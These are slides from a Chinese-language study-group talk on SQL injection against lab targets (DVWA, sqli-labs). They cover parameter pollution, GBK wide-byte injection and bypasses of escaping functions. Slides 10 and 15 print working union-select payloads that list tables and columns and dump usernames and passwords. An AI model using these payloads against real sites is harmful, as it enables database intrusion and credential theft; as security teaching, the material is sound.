時間：2020.12.03 地點：好想工作室 - 想知道嗎 題目：Sql-injection

1. 想知道嗎？ 2020/12/03
Jeff
1/2/2021
0

2. Metasploitable
Dvwa 的 SQL-INJECTION
Sqli-labs的 SQL-INJECTION
HPP
寬字節注入
 繞過 Preg_place()
 繞過 addslashes
1/2/2021 1

3. 1/2/2021 2
 Linux Based-Vulnerability machine
今天會講到的應用程式

4. 1/2/2021 3
 Damn Vulnerable Web Application
https://hackmd.io/@jeff14994/ByWjCHPII#/

5. 1/2/2021 4
 Sqli-Injection 漏洞的 Application
OS: 千萬不要把 Sqli-Labs 整合到 Metasploitable…

6. 1/2/2021 5
https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf

7. 1/2/2021 6
https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf
POST & GET 都是解析前一個參數

8. 1/2/2021 7
Sqli-labs
Less-29/Login.php
tomcat 作為 WAF
apache 處理 sql 查詢

9. 1/2/2021 8
Less-29/Login.php

10. 1/2/2021 9
Less-29/Login.php
Payload:
?id=1&id=-1' union select 1,database(),3--+

11. 1/2/2021 10
Sqli-labs
MySQL -> 使用 GBK (寬字節)編碼時，兩個字節為一個漢字
- 使用 %df 吃掉 %df%27
%df%5c%27
addslash
GBK 編碼
運%27 得到 ‘

12. 1/2/2021 11
Less-32/index.php -> preg_replace()
Sqli-labs

13. 1/2/2021 12
Less-33/index.php -> 繞過 addslashes()
Sqli-labs

14. 1/2/2021 13
Less-36/index.php -> 繞 my_real_escape_string()
Sqli-labs

15. 1/2/2021 14
Less-32/index.php
Less-33/index.php
Less-36/index.php
Payload:
爆 Table
?id=-1%df' union select 1,
(select group_concat(table_name) from information_schema.tables where
table_schema=(select database())),
3--+
爆 Column
?id=-1%df' union select 1,
(select group_concat(column_name) from information_schema.columns where
table_schema=(select database()) and table_name=(select table_name from
information_schema.tables where table_schema=(select database()) limit 3,1)),
3--+
爆內容：
?id=-1%df' union select 1,
(select group_concat(username,0x3a,password) from users),3--+
0x3a 表冒號

16. 1/2/2021 15
Sql-injection 最難的地方在找注入點
各種蛛絲馬跡找 Server 的回傳

17. 1/2/2021
16

18. 1/2/2021
17

19. 1/2/2021
18